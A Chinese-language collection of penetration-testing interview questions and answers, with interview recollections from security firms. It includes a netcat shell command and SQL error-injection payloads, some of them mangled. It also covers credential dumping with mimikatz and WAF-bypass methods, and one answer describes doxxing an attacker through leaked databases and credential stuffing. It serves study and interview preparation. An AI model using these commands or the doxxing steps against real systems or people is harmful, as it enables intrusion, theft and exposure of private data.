- 利用协议读取本地文件。
- 云计算环境AWS Google Cloud 环境可以调用内网操作ECS 的 API。
webligic SSRF漏洞：通过SSRF的gopher协议操作内网的redis，利用redis将反弹shell写入crontab定时任务，url编码，将\r字符串替换成%0d%0a。

39.SVN/GIT源代码泄露？

SVN原理：
在使用SVN管理本地代码过程中，会自动生成一个名为.svn的隐藏文件夹，其中包含重要的源代码信息：
SVN修复方式：
查找服务器上所有 .svn 隐藏文件夹，删除。开发人员在使用 SVN 时，严格使用导出功能。禁止直接复制代码。
GIT原理：
使用git进行版本控制，对站点自动部署。如果配置不当，可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。
GIT修复方式：
查找服务器上所有 .git 隐藏文件夹，删除。中间件上设置 .git 目录访问权限，禁止访问。

40.提权你了解过吗？udf提取原理是什么

将udf文件放到指定位置（Mysql>5.1放在Mysql根目录的lib\plugin文件夹下）
从udf文件中引入自定义函数(user defined function)
执行自定义函数
完整：MySQL和PostgreSQL等数据库软件中允许用户自定义函数，并使用这些自定义函数进行查询。由于UDF函数可以动态加载，这就为攻击者提供了一种途径，即将恶意代码编写成UDF形式并上传到数据库，然后通过SQL注入等手段触发该函数，从而获得系统管理员权限。

41.反弹 shell 的常用命令？一般常反弹哪一种 shell？为什么？

nc -lvvp 7777 -e /bin/bash
bash是交互式,否则像useradd无法执行交互

42.如何手工判断对方操作系统？

修改url中参数，改成大写，正常为windows，不正常即为linux
ping服务器，返还得TTL值不一样，windows一般在100以上，linux一般是100以下。
查看数据包HTTP报头，如果是iis那就肯定是windows

43.DDos攻击

客户端向服务端发送请求链接数据包，服务端向客户端发送确认数据包，客户端不向服务端发送确认数据包，服务器一直等待来自客户端的确认

没有彻底根治的办法，除非不使用TCP

DDos预防：

（1）限制同时打开SYN半链接的数目

（2）缩短SYN半链接的Time out 时间

（3）关闭不必要的服务

44.找到一个注入点怎么判断对方什么数据库？

常见的数据库Oracle、MySQL、SQL Server、Access、MSsql、mongodb等
关系型数据库：由二维表及其之间的联系组成的一个数据组织。如：Oracle、DB2、MySql

可以使用特定的函数来判断，该数据库特有的。
- len()函数：mssql、mysql、db2
- length()函数:Oracle、informix
- substring：mssql
- substr：oracle
- version()>1 返回与@@version>1 相同页面时，则可能是mysql。如果出现提示version()错误时，则可能是mssql。
可以使用辅助的符号来判断，如注释符号、多语句查询符等等。
- /* mysql特有注释符，返回错误说明不是mysql
- – 是Oracle和MSSQL支持的注释符，如果返回正常，则说明为这两种数据库类型之一。继续提交如下查询字符
- ; 是子句查询标识符，Oracle不支持多行查询，因此如果返回错误，则说明很可能是Oracle数据库。
可以利用错误信息
- 错误信息中包含了"MySQL"和"server version"等关键词，这表明该目标系统可能是MySQL数据库。
- 错误信息中包含了"quotation mark"等关键词，这表明该目标系统可能是MSSQL数据库。
- 错误信息中包含了"Syntax error"等关键词，这表明该目标系统可能是ACCESS数据库
是否存在数据库某些特性辅助判断
- and exists (select count(*) from sysobjects) 返回正常是mssql
- and exists (select count(*) from msysobjects) 两条，和上一条返回都不正常是ACCESS，如果是字符型，参数后加 ’ 最后加 ;–

45.报错注入的函数有哪些？10个

（1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))

（2）通过floor报错向下取整

（3）and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

（4）select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b));

（5）select from test where id=1 and multipoint((select from(select from(select user())a)b));

（6）select from test where id=1 and polygon((select from(select from(select user())a)b));

（7）select from test where id=1 and multipolygon((select from(select from(select user())a)b));

（8）select from test where id=1 and linestring((select from(select from(select user())a)b));

（9）select from test where id=1 and multilinestring((select from(select from(select user())a)b));

（10）select from test where id=1 and exp(~(select * from(select user())a));

46.为什么参数化查询可以防止sql注入？

使用参数化查询数据库服务器不会把参数的内容当作sql指令的一部分来执行，是在数据库完成sql指令的编译后才套用参数运行

简单的说: 参数化能防注入的原因在于,语句是语句，参数是参数，参数的值并不是语句的一部分，数据库只按语句的语义跑

47.SQL注入单引号被过滤怎么办？

采用URL编码进行绕过 ’ --> %27

48.SQL注入逗号被过滤了怎么办？

存在联合注入用join代替逗号
存在盲注，使用substring函数和ascii函数

49.Mysql一个@和两个@什么区别？

一个@是用户自定义变量两个@是系统变量，如@@version、@@user

50.json格式的CSRF如何防御?

启用CSRF令牌

{
“name”: “John”,
“age”: 30,
“csrf_token”: “random_string_here”
}

使用SameSite Cookie
- 具体实现方式可以在每个JSON请求中添加一个带有SameSite属性的Cookie，如下所示。
  - Cookie: session_id=random_string_here; SameSite=Strict

51.过滤limit后的逗号如何绕过?

采用OFFSET参数
- SELECT * FROM tb_brand LIMIT 2 OFFSET 1 --> 从1开始取两条数据

52.在渗透过程中，收集目标站注册人邮箱对我们有什么价值？

(1)丢社工库里看看有没有泄露密码，然后尝试用泄露的密码进行登录后台

(2)用邮箱做关键词进行丢进搜索引擎

(3)利用搜索到的关联信息找出其他邮箱进而得到常用社交账号

(4)社工找出社交账号，里面或许会找出管理员设置密码的习惯

(5)利用已有信息生成专用字典

(6)观察管理员常逛哪些非大众性网站，拿下它，你会得到更多好东西

53.目前已知哪些版本的容器有解析漏洞，具体举例

1、IIS 6.0

/xx.asp/xx.jpg "xx.asp"是文件夹名

2、IIS 7.0/7.5

默认 Fast-CGI 开启，直接在 url 中图片地址后面输入/1.php，会把正常图片当成 php 解析

3、Nginx

版本小于等于 0.8.37，利用方法和 IIS 7.0/7.5 一样，Fast-CGI 关闭情况下也可利用。空字节代码

xxx.jpg.php

4、Apache

上传的文件命名为：test.php.x1.x2.x3，Apache 是从右往左判断后缀

54.如何突破注入时字符被转义？**

宽字符注入
hex 编码绕过

55.提权时选择可读写目录，为何尽量不用带空格的目录？

因为 exp 执行多半需要空格界定参数

web bypass waf问题

1.WAF绕过的手法你知道哪些？

这里从以sql注入为例，从三个层面简单总结一下手法。

1.从架构层面：找到服务器真实IP，同网段绕过，http和https同时开放服务绕过，边缘资产漏洞利用绕过。

2.从协议层面：分块延时传输，利用pipline绕过，利用协议未覆盖绕过，POST及GET提交绕过。

3.从规则层面：编码绕过，等价符号替换绕过，普通注释和内敛注释，缓冲区溢出，mysql黑魔法，白名单及静态资源绕过，文件格式绕过，参数污染。

2.文件上传绕过WAF思路？

参考文章：https://cloud.tencent.com/developer/beta/article/1944142

web 典型漏洞问题

1.讲诉一些近期及有代表性的漏洞

Microsoft Exchange .Net反序列化远程代码执行(CVE-2020-0688)：该漏洞是由于Exchange控制面板（ECP）组件中使用了静态密钥validationKey和decryptionKey。
Apache Tomcat 文件包含漏洞(CVE-2020-1938)：默认情况下,Tomcat会开启AJP连接器, Tomcat在AJP协议的实现上存在漏洞,导致攻击者可以通过发送恶意的请求,可以读取或者包含Web根目录下的任意文件,配合文件上传，将导致任意代码执行(RCE)。
Weblogic IIOP反序列化漏洞（CVE-2020-2551）：weblogic核心组件中IIOP协议，通过该协议对存在漏洞的WebLogic进行远程代码执行的攻击。Apache Solr远程代码执行（CVE-2019-12409）：默认配置文件solr.in.sh,在其配置文件中ENABLE_REMOTE_JMX_OPTS字段默认配置不安全.如果使用默认配置,将启用JMX监视服务并将对公网监听18983的RMI端口,无需任何验证,配合JMXRMI远程代码执行。
SHIRO-550 反序列化漏洞：shiro默认使用了CookieRememberMeManager，其处理cookie的流程是：得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化。AES的密钥是硬编码在代码里，就导致了反序列化的RCE漏洞。
SHIRO-721反序列化漏洞：不需要key，利用PaddingOracle Attack构造出RememberMe字段后段的值结合合法的RememberMe cookie即可完成攻击。
泛微Ecology OA SQL注入漏洞：validate.jsp接口的SQL注入，/cpt/manage/validate.jsp。泛微ecology OA系统接口存在数据库配置信息泄露：/mobile/dbconfigreader.jsp,直接访问该页面将为DES加密以后的乱码,使用DES算法结合硬编码的key进行解密。
Confluence 本地文件泄露漏洞 (CVE-2019-3394)catalina.jar中的org.apache.catalina.webresources.StandardRoot.class的getResource方法的validate存在过滤和限制，所以可遍历路径均在/WEB-INF下。
Apache Dubbo反序列化漏洞（CVE-2019-17564）：当HTTP remoting 开启的时候，存在反序列化漏洞。

2.python有哪些框架，其中出现过哪些漏洞？

flask的模板注入模板注入和常见Web注入的成因一样，也是服务端接收了用户的输入，将其作为 Web 应用模板内容的一部分，在进行目标编译渲染的过程中，执行了用户插入的恶意内容，因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。模板字符串中字符串拼接或替换可能会导致敏感信息泄露，获取变量值如果开发者在flask使用字符串格式化，来将用户输入动态地加入到模板字符串中，而不是通过render_template_string函数，该函数不会对输入进行实体转义将URL传递进入模板内容当中，会导致xss的产生。还可以利用模板中html标签属性字段绕过xss过滤。
Django出现过目录遍历漏洞

内网

基础问题

1.拿到webshell不出网情况下怎么办？

reg上传去正向连接。探测出网协议，如dns，icmp。

2.3389端口无法连接的几种情况？
1.3389关闭状态，2.端口修改，3.防火墙连接，4.处于内网环境，5.超过了服务器最大连接数，6.管理员设置权限，指定用户登录。

3.对于不能直接上传而且只能通过命令行执行的shell，应该怎么办？

使用bitsadmin 进行下载
使用powershell 进行下载
使用certutil 进行下载
使用WGET 进行下载
参考文章https://blog.csdn.net/weixin_42918771/article/details/110394116

4.shiro不出网怎么利用？

定位Web目录写入文件
构造回显
内存马
时间延迟获取Web路径写入webshell

5.横向渗透命令执行手段？

psexec，wmic，smbexec，winrm，net use 共享+计划任务+type命令。

6.psexec和wmic或者其他的区别？

psexec会记录大量日志，wmic不会记录下日志。wmic更为隐蔽

7.内网抓取密码的话会怎么抓？

procdump+mimikatz 转储然后用mimikatz离线读取

8.操作系统什么版本之后抓不到密码？抓不到怎么办？

windows server 2012之后
方法：
- 翻阅文件查找运维等等是否记录密码。
- 或者hash传递。
- 或者获取浏览器的账号密码等等。

9.桌面有管理员会话，想要做会话劫持怎么做？

提权到system权限，然后去通过工具，就能够劫持任何处于已登录用户的会话，而无需获得该用户的登录凭证。

10.内网渗透思路？

代理穿透
权限维持
内网信息收集
口令爆破
凭据窃取
社工横行和纵向渗透
拿下域控

11.当前机器上有一个密码本，但加密了，应该怎么办？

使用hashcat或者其他密码爆破工具进行爆破。

12.Windows权限维持？Linux权限维持？

参考文章
- windows: https://xz.aliyun.com/t/8095
- linux: https://xz.aliyun.com/t/7338

13.代理转发常用的工具有哪些？

frp
Neo-reGeorg
ssf
ew
Venom

14.目标机器ping不通外网，没有办法走网络层协议，如何搭建隧道?

搭建基于webshell的内网隧道：Neo-reGeorg、pystinger

15.正向Shell和反向Shell的区别是什么？

正向shell：攻击者连接被攻击机器，可用于攻击者处于内网，被攻击者处于公网的情况。
反向shell：被攻击者主动连接攻击者，可用于攻击者处于外网，被攻击者处于内网的情况。

16.向代理和反向代理的区别？

正向代理：当客户端无法访问外部资源的时候(例如goolge，youtube)，可以通过一个正向代理去间接的访问。
- 打个比方：A向C借钱，由于一些情况不能直接向C借钱，于是A想了一个办法，他让B去向C借钱，这样B就代替A向C借钱，A就得到了C的钱，C并不知道A的存在，B就充当了A的代理人的角色。
反向代理：客户端时无感知代理的存在，以代理服务器来接收internet上的连接，然后将请求转发给内部网络上的服务器，并从服务器上得到的结果返回给internet上请求连接的客户端。
- 再次打个比方：A向B借钱，B没有拿自己的钱，而是悄悄地向C借钱，拿到钱之后再交给A,A以为是B的钱，他并不知道C的存在。

在内网渗透中，正反向代理可以这样回答

正向代理：已控服务器监听端口，通过这个端口形成一个正向的隧道，由代理机器代替主机去访问内网目标。但是内网入口一般处于DMZ区域有防火墙拦截，无法直接进入内网环境。

反向代理：由内网主机主动交出权限到代理机器，然后本地去连接形成反向代理。例如：VPS监听本地端口，已控内网服务器来连接此端口，形成一个隧道。如果内网设备连接外网，就无法回弹只能再想其他办法。

17.windows和Linux查看开放端口和运行服务的命令？

windows：查看端口使用情况【netstat -ano】，查看运行的服务【 net start】
Linux：查看本机开放端口【netstat -tuln】，查看当前所有运行的服务【service --status-all | grep running】

18.windows中下载文件的命令有哪些？

certutil，bitsadmin，powershell，copy
参考文章：winodws下载执行命令大全：https://xz.aliyun.com/t/1654

19.windows提权的方法及思路？

系统内核溢出提权；
数据库提权；
错误的系统配置提权；
DLL劫持提权；
特权第三方软件or服务提权；
令牌窃取提权；
web中间件漏洞提权；
AT，SC，PS提权等等；

20.Linux提权的思路及方法有哪些？

系统内核溢出提权；
SUID和GUID提权；
不安全的环境变量提权；
定时任务提权；
数据库提权等

21.反弹 shell 的常用命令？一般常反弹哪一种 shell？为什么？

nc -lvvp 7777 -e /bin/bash
bash是交互式,否则像useradd无法执行交互

22.CMD命令行如何查询远程终端开放端口

tasklist /svc
netstat -ano

23.Dcom怎么操作？

通过powershell执行一些命令，命令语句比较复杂，不记得了

24.桌面有管理员会话，想要做会话劫持怎么做？

提权到system权限，然后去通过工具，就能够劫持任何处于已登录用户的会话，而无需获得该用户的登录凭证。

25.pth，ptt，ptk区别？

参考文章：https://blog.csdn.net/Waffle666/article/details/120268915

内网免杀相关问题

1.shellcode免杀了解吗？有哪些方法？

参考文章：https://xz.aliyun.com/t/7170

内网域问题

1.域内攻击方法有了解过吗？

MS14-068、Roasting攻击离线爆破密码、委派攻击，非约束性委派、基于资源的约束委派、ntlm relay。

2.获取域控的方法有哪些？

SYSVOL
MS14-068 Kerberos
SPN扫描
黄金票据和白银票据
域服务账号破解
凭证窃取
NTLM relay
kerberos委派
zerologon漏洞
地址解析协议
CVE-2021-42278和CVE-2021-42287

3.黄金票据和白银票据说一下？

参考文章：https://www.jianshu.com/p/4936da524040

4.域信息收集思路？

判断是否存在域
定位域控
域基本信息查询（所有域、域信任信息、域密码策略）
域内用户查询（定位域管）
域内主机查询
BloodHound工具

5.如何快速定位域控，介绍三种方式？

使用命令行工具
- nslookup -type=srv _ldap._tcp.dc._msdcs.domain.com
- nltest /dclist:domain.com
使用Active Directory Sites and Services
使用PowerShell脚本
- 通过Get-ADDomainController命令获取域控制器信息:Get-ADDomainController -Discover -Service PrimaryDC

应急响应与蓝队问题

1.windows或linux被植入后门文件，讲一下你的排查流程？

检查系统日志，检查系统用户，查看是否有异常的系统用户，检查异常进程，检查隐藏进程，检查异常系统文件，检查系统文件完整性，检查网络，检查系统计划任务，检查系统后门，检查系统服务。

2.木马驻留的方式有哪些(去哪些敏感位置排查木马)？

注册表
服务
自启动目录
集合任务
关联文件类型

3.你知道哪些常用的威胁情报平台？

微步情报社区：https://x.threatbook.cn/
奇安信情报中心：https://ti.qianxin.com/
绿盟情报中心：https://nti.nsfocus.com/apt/home
此外360绿盟情报中心，VT，安恒等等

4.设备误报如何处理（日志）？

关键字检测
异常请求
行为分析

5.如何查看区分是扫描流量和手动流量？

扫描流量：流量集中，具有数据包内容具有一定规律型，数据包请求间隔低或频率基本一致。
手工流量：反之扫描流量回答即可

6.内网告警应该如何处理，流程是怎么样的？

具体定位到哪台机器，报警说明知道具体漏洞类型，打相应补丁。利用webshell或者是shell查杀工具查杀，查看tmp目录下是非有带有免杀的木马。彻底清除。再到全流量分析的机子上看，是非有经过其他的机器。拿到攻击ip之后到线上的一些网站查看主机类型，比如360或者微步上，查看是否是傀儡机，vps跳板，或者是国内个人云主机。如果是个人云主机，就可以通过whois查看是非有最近绑定的域名，或者绑定者的邮箱。知道邮箱之后就可以反查询出qq号说多少，再利用社工查询到手机号，到一个知名的网站或知名软件上查询这个手机号有没有注册过什么网站，可以去这些网站通过撞库的方法登入，这样就可以拿到这个攻击者的身份证，学校，地址这些了

7.应急响应的简单流程？

收集信息：由安全设备收集主机，样本信息，以及一些客户信息。
判断类型：是否是安全事件？具体为什么安全事件？挖矿？DOS？等。
深入分析：从系统角度深入分析，日志，进程，启动项这些去分析。
清理处置：杀掉异常进程，删除异常文件，打补丁或者修复相关文件等。
产出报告：对此次安全事件进行一个完整的文档描述。

8.防火墙怎样判断这是一个反序列化漏洞？

抓包，反序列化的数据包有固定格式的字符串：O:length:“value”:属性数：{属性类型:属性length:属性value;属性类型:属性length:属性value;}。

9.应急响应如何查找挖矿病毒，如何通过进程找到挖矿文件？

(1) 任务管理器netstat -anp寻找异常进程PID看端口信息，然后根据端口信息定位到文件，cd /proc/PID （ls -l查看），禁用可疑的服务项。

(2) windows还可以用wmic分析进程参数。

10.如何查看被入侵后敲过的命令?

History

11.假设发现web应用服务器发现文件异常增多，初步怀疑被上传webshel，描述流量分析溯源的思路?

查看eval、z0、shell、whoami等关键字，查看出现次数过多的时候，可能需要查看是哪个页面发起的请求，有可能是webshell。
通过WireShark 工具快速搜索关键字，定位到异常流量包。
找出异常IP和所上传的内容，查看是否为webshell。

12.Webshell流量交互的流量特征?

Webshell是用来控制服务器的，在控制服务器的过程中，就会触发许多系统，函数，例如eval、z0（菜刀特征）、shell.需监控这些关键的函数，具体需要查看是哪个网页发起的请求进行鉴别。
Webshell连接可能使用base64编码，正常功能也会使用base64容易引起误报，一般与eval数量对比，数量差异较小时可能被上传webshell进行编码通讯。
除了系统函数、base64编码通讯外，还存在int_set(“display_errors",0"）.为Webshell流量特征之一。
还可以监控ifconfig whoami ipconfig等关键命令，这是获得Webshell后基本，上都会执行的命令。

13.SQL查询异常流量分析的思路？

数据库短时间内查询增多有可能遭遇到了【扫描】或者【sql注入测试】，可以结合流量分析工具进行研判。
【select】和【union】为数据库查询语句特征，当这两者数量出现次数较多而且差异较小可能存在SOL注入漏洞或正在被扫描器扫描，可监控这两个关键字，但还需要进一步查看具体请求参数。如：1)使用wireshark打开抓取后的流量包，2)对于抓取到的数据包筛选出HTTP协议包，在统计处筛选出短时间内流量较大的IP。
尝试定位一些基本的注入特征（select、union、（）、/*、sleep等）。

14.批量检查http服务？

方法一：直接使用nmapsV.py工具即可，用法为python3 nmapsV.py ip.txtresult.txt。
方法二：使用nmap工具扫描，带上-sV参数进行版本识别即可，将待检测的IP地址/地址段添加进ip.txt文件中。使用命令nmap -sV -il ip.txt-oA OUTPUT --no-stylesheet,扫出来的结果导出nmap文件，使用nampReport工具得出结果。

15.你使用什么工具来判断系统是否存在后门？

Chkrootkit
Rkhunter

16.sftp，telnet，ssh的端口号？ssh与telnet的区别？

sftp：22，telnet：23，ssh：22。
简单来说，ssh和telnet的区别就是一个是密文传输，一个是明文传输。

17.对蜜罐有什么了解？

蜜罐是对攻击者的欺骗技术，用以监视、检测、分析和溯源攻击行为，没有业务用途。
蜜罐的流量预示着扫描或攻击行为，较好聚焦攻击流量。

18.有没有了解或者使用过厂商的安全设备？(有的话请举例说明)

而目前比较知名的态势感知厂商主要有：服云、安恒、瀚思、360、深信服、新华三，绿盟，奇安信等等。
演示视频：新华三A02演示视频：https://v.youku.com/v_show/id_XMzk4NTc4NDM4MA==.html
其他的自己找找，或者根据个人情况回答。

流程

windows加固

1.windows加固方法

修改3389端口
设置安全策略，不允许SAM账户的匿名枚举，不允许
SAM账户和共享的匿名枚举在组策略中设置阻止访问注册表编辑工具
开启审核对象访问，开启审核目录服务访问，开启审核系统事件
禁止445端口漏洞
设置屏幕保护在恢复时使用密码保护
设置Windows密码策略：设密码必须满足复杂性，设置密码长度最小值为8位，最长存留期为30天
开启Windows防火墙，关闭ping服务，打开3389、80等服务
关闭系统默认共享

Linux加固

1.Linux加固方法？

修改ssh的配置文件，禁止root直接登录
修改密码策略配置文件，确保密码最小长度为8位
确保错误登录3次，锁定此账户5分钟
禁止su非法提权，只允许root和wheel组用户su到root
不响应ICMP请求
设置登陆超时时间为10分钟，结束非法登录用户

具体公司岗位面试题目

字节跳动-渗透测试实习生

自我介绍
渗透的流程
信息收集如何处理子域名爆破的泛解析问题
如何绕过CDN查找真实ip
phpinfo你会关注哪些信息
有没有了解过权限维持
说一个你感觉不错的漏洞，展开讲讲
输出到href的XSS如何防御
samesite防御CSRF的原理
CSRF防御
json格式的CSRF如何防御
浏览器解析顺序和解码顺序
过滤逗号的SQL注入如何绕过
过滤limit后的逗号如何绕过
fastjson相关漏洞
说一个你知道的python相关的漏洞（SSTI原理，利用过程,payload相关的东西）开放性问答

字节跳动-安全研究实习生

一面

你投的岗位是安全研究实习生，你了解我们这边主要是做什么的吗
自我介绍
现在有什么比较想做的方向吗，比如你写的代码审计、攻防演练、你在学校的研究方向（密码学）其实是三个大方向，现在有什么比较想做的吗
- 说了代码审计、安全研究
有没有审过开源框架、cms、中间件之类的
面试官介绍了工作内容
我看你简历上有几段实习经历和项目经历，先聊一下实习经历吧，在A主要做什么的
详细聊聊入侵检测主要在做什么，遇到的问题
关于入侵检测产生大量误报的原因，有没有分析过，有没有比较好的解决方法
和A比起来，B的应该就比较偏攻击方对吧，有打仗（雾，面试官好像确实是这么说的）有代码审计，聊一下在B主要做了些什么
审表达式引擎的步骤和思路
刚刚你说的审计听起来好像和普通开发的审计差不多，都是通过程序流、文档去做，有没有从安全方面入手审计一些项目
xxe是怎么造成的，从代码层面来看
我看你简历有很多攻防演练经历对吧，这几段攻防演练经历有没有哪一次印象比较深刻的，挑一个聊一聊
你的这次攻击好像更多的是利用弱口令，有没有一些更有技巧的方法
这个头像上传的webshell是怎么上传的
还有什么其他的检验方式？要怎么绕过？
这两天log4j漏洞很火，有没有去了解一下
面试官最后介绍业务
反问环节

一面plus-安全研发实习生

很奇葩的剧情，一面面试官面完告诉我有base北京base深圳问我是不是想要深圳的，我说是，结果过了一个多星期hr告诉我因为我一面面试官是北京的，然后我选了深圳，所以一面不作数，重新约了一面

接着一面这天中午又收到了感谢信，然后看官网状态是流程已终止，本以为没得面了没想到还是正常进行…

等到二面才发现原来已经变成安全研发了，本来我投的是安全研究的…

自我介绍
A护网做了什么
做哪一层的处置，waf？ids？
遇到的问题是什么，有什么印象深刻的处置
怎么解决误报过多的情况，有做过什么规则能解决这个情况的
他的内网误报是在办公网还是生产网
比如mysql也会执行powershell，怎么做防护（前面说了很多内网误报是因为有人写了ps脚本触发的）
有没有挖过src
在做攻防的时候，资产收集这块有没有什么经验介绍的
一个单位的一级域名可能不止一个，怎么收集某个单位的所有域名，注意不是子域名
还有没有其他的资产收集的经验
除了信息收集，有没有什么漏洞方面的攻击案例
聊一下sql注入
怎么防御
遇到order by时怎么防御
用转义字符防御时，如果遇到数据库的列名或是表名本身就带着特殊字符，应该怎么做
宽字节注入
ssrf了解吗
怎么修复
基于黑白名单的修复，现在的生产基本都是用的docker，ip是随时变的，而且docker重启后可能什么都不一样了，怎么做一个修复
fastjson反序列化
redis的漏洞
mysql的提权
shiro反序列化
最近很火的log4j，聊一下原理
jndi的解析流程和原理
有没有什么你做的比较好的地方我没有问到的，可以聊一聊
惯例介绍部门的主要业务
惯例反问

二面

紧接在一面plus后，就隔了10分钟，一面复盘写一半就开始二面了

聊攻防演练中比较得意、印象深刻的一次经历
安全领域比较擅长什么
审的一般是什么，java？python？
csrf了解吗，怎么做一个修复
在拿到java系统的代码时，审计的流程是怎样的
java系统中的sql注入怎么做一个防御和修复
在浏览器中输入一个域名去访问时，浏览器做了什么
一个系统的登录页，通常可能出现什么漏洞
云安全了解吗
有做过安全工具的开发吗，比如waf或者扫描器之类的
惯例介绍业务
惯例反问

字节跳动-无恒实验室

自我介绍
阿里巴巴实习介绍？
启明星辰实习介绍？
消息队列是自研的，还是开源的？叫什么名字？
任务下发？状态监测
子域名扫描插件怎么写的？
指纹识别插件怎么写的？
wappalyzer怎么进行指纹识别的？
CSDN的XSS漏洞挖掘过程？
SQL注入的原理？
目前防御SQL注入的方式有哪些？
有哪些SQL语句无法使用预编译的方式？
SQL注入如何判断注入点？
已知example.com/?id = 1，是mysql，如何获得mysql版本？
无回显情况下怎么弄？ceye dnslog外带
除了外带呢？
CSRF的原理？
CSRF使用POST请求时，如何攻击？隐藏表单
不是表单呢？
AJAX发送POST请求？
Ajax发送POST请求会发几个数据包？
让你来写一个CSRF攻击插件，你怎么写？包含哪些模块？
SSRF的原理？
让你写一个SSRF插件，你怎么写？
反问环节

阿里云安全实习

自我介绍
看你简历上说擅长java、php代码审计，也没有类似的经历能够分享一下，比如说独自审的一套代码或者开源项目，从中发现的一些比较高危的问题
在审项目的时候，比如一个web网站，简单说说思路
简单描述一下什么是水平越权，什么是垂直越权，我要发现这两类漏洞，那我代码审计要注意什么地方
解释一下ssrf
怎么防御ssrf，场景：http://ip/?url=image.jpg
常见的内网段有哪些，他们的掩码是什么
教育系统攻防演练，分享一个渗透的例子
除了学校，有没有试过渗透别的系统
像这样的场景（给内网靶标），渗透内网系统的思路
反问环节（问了工作内容）
- 岗位做的是阿里云云平台安全，内部安全保障，保障阿里云自身的安全不出问题，整个系统的上线前中后过程，每个方向都有人

深信服-漏洞研究员实习

自我介绍
在xx实习的时候做什么东西
渗透测试的思路简单说一下
护网在里面担当一个什么样的角色
红队的一些思路
拿下系统后有没有做横向
前段时间那个log4j有研究吗，可以简单说一下吗
（继上一个问题）有哪些混淆绕过的方法
内存马有没有了解过
冰蝎、哥斯拉这些工具有没有了解过
做攻击队的时候有没有研究过什么攻击，比如研究一些工具还是魔改什么的
那么多漏洞和攻击，比较擅长哪一个
说一下shiro反序列化的形成原因、利用链
对一些bypass的方法有没有了解过，有什么姿势可以简单介绍一下
反问

深信服

宽字节注入原理，是只有 gbk 编码的才存在宽字节注入吗？
php 反序列化原理
内网一台机器，只有一个 mssql 的服务账户权限，如何进行后续的利用
rsa 算法原理/aes 算法原理
一台机器不能出网，如何把一个 exe 文件放到对应的目标机器上去（dmz 区）

深信服-深蓝攻防实验室

内网怎么打思路
国护刷分策略通用性的寻找通用靶标思路怎么刷
数据库主机云 vcenter 刷满是多少分（看你打的多不多对分的规则熟悉不）
内网的多级代理用什么东西代理
如果 tcp 和 udp 不出网用什么策略来进行代理的搭建
多级代理如何做一个 cdn 进行中转具体怎么实现
内网有 acl 策略如果是白名单如何绕过这个白名单进行出网上线 ip 和域名的都有可能

长亭科技-安全服务工程师

一面

自我介绍
web渗透测试有没有过实战
讲一下sql注入原理
有没有从代码层面了解过sql注入的成因（反问代码层面指的是不是sql语句，答是）
了不了解xss，有没有从代码层面了解xss的原理
对owasp top10漏洞哪个比较了解
讲一讲怎么防御sql注入
sql注入怎么绕过过滤
问了护网时xx有没有成为靶标，有没有对攻击队行为做过研判
在xx护网时的工作内容，有没有做过流量包、数据包的研判
学校攻防演练时担任的角色，主要工作内容，渗透测试的思路，有什么成果（这个问的还是挺细的，具体到分配的任务、有没有拿下主机或者域控、攻防演练的形式和持续时间等都聊了）
平时ctf打的多不多，有什么成绩
平时会不会关注一些新颖的漏洞，会不会做代码审计，比如shiro漏洞等有没有做过漏洞复现
对钓鱼邮件这些有没有什么了解（因为上面聊xx护网时说了钓鱼邮件和微信钓鱼的事）
目前学习的方向是什么
最后介绍人才需求
反问环节

二面

自我介绍
学代码审计偏哪个语言？擅长哪个语言
拿到一份php代码做审计，审计的流程大概是怎样的
对php开发框架熟吗？比如ThinkPHP这些
给的源码是ThinkPHP框架的话，审计起来和没有使用框架的有什么不同，从流程上或者从关注的点上有什么不同
php原生的敏感函数有哪些，比如搜关键字的话会搜哪些
反序列化漏洞了解吗
反序列的时候，unserialize()反序列一个字符串的时候，对象会有一些魔术方法会被自动调用到，在找反序列化的链时，有哪些魔术方法是可以作为一个入手点去找的
有没有审计过实际的项目，比如github上一些开源cms
java审计可以聊一下吗
之前做渗透时有没有做过完整的项目，除了ctf
能不能说一些找到的漏洞，怎么找到的
ssrf这类的漏洞熟悉吗，说一下原理和利用方式
我们利用ssrf可以做什么，达到什么效果
在php环境下，怎么最大程度的利用ssrf，拿到shell或者进内网
怎么利用内网的机器请求内网中的服务
ssrf漏洞的修复建议，修复的时候需要注意哪些细节
如果用白名单策略修复ssrf，从用户输入的变量里拿出要访问的目标，这个要注意哪些，因为一些url会通过特殊的字符做白名单绕过，对取变量这个操作有哪些要注意的细节？
php中三个等号和两个等号有什么区别
php代码常见入口函数怎么找
有一些php的开发框架可以帮我们做一些url路由，对这些路由的方法熟悉吗
介绍下PHP的变量覆盖
有一个php的程序，本身就允许文件包含的操作，同时想要避免文件包含漏洞，写代码的时候要注意哪些
远程文件包含和本地文件包含，这两种涉及的php设置有什么
本地文件包含能不能通过php配置限制文件包含的路径（不通过代码直接通过配置项来解决）
php、java代码审计对哪个漏洞特别熟悉
php在做sql注入防御时有哪些方法
java做sql注入的防御
sql的二次注入了解吗，能介绍一下吗
写代码的时候怎么防止二次注入

长亭科技-安全服务工程师实习

讲一下最熟悉的三种web漏洞类型，原理，测试方式
SQL注入过滤单引号怎么绕过
mysql报错注入常用的函数
报错注入绕waf
mysql写文件的函数有哪些
into outfile使用有哪些限制
mysql提权
sqlserver除了sql注入外还有什么渗透的方式
ssrf漏洞原理
ssrf可以使用的伪协议
哪些功能点会有ssrf
对内网ip进行过滤，有什么绕过的方式
有了解过Redis RCE的过程吗
Redis未授权如何获得服务器权限
Redis主从复制漏洞
任意文件读取，一般读取什么类型的文件
如何通过文件读取获取到web的绝对路径
/etc/passwd文件包含哪些内容
java反序列化漏洞有了解吗
之前shiro的反序列化漏洞有了解吗
知道哪些组件或中间件包含反序列化漏洞
针对一个站点，你首先会做什么事
说几个你比较熟悉的CMS，它有哪些特征
正向代理和反向代理的区别
说一下常见的端口对应的服务有哪些
有没有接触过护网这块的工作
比较常见的内置用户有哪些
说一下映像最深刻的一次渗透测试经历，说一下大概过程，发现了什么漏洞
有没有挖过业务逻辑的漏洞
挖过哪些SRC
挖到最多的是哪些类型漏洞
弱口令，有验证码怎么绕过
说一下非对称加密算法的加密过程
有哪些了解过的非对称加密算法

天融信面试复盘

有没有做过现实环境的渗透测试？有没有提交过src？
对免杀技术了解多少，制作的木马能不能过360
ctf的成绩？擅长什么方向的题？
攻防演练有什么成果？
shiro漏洞了解吗，讲一下原理
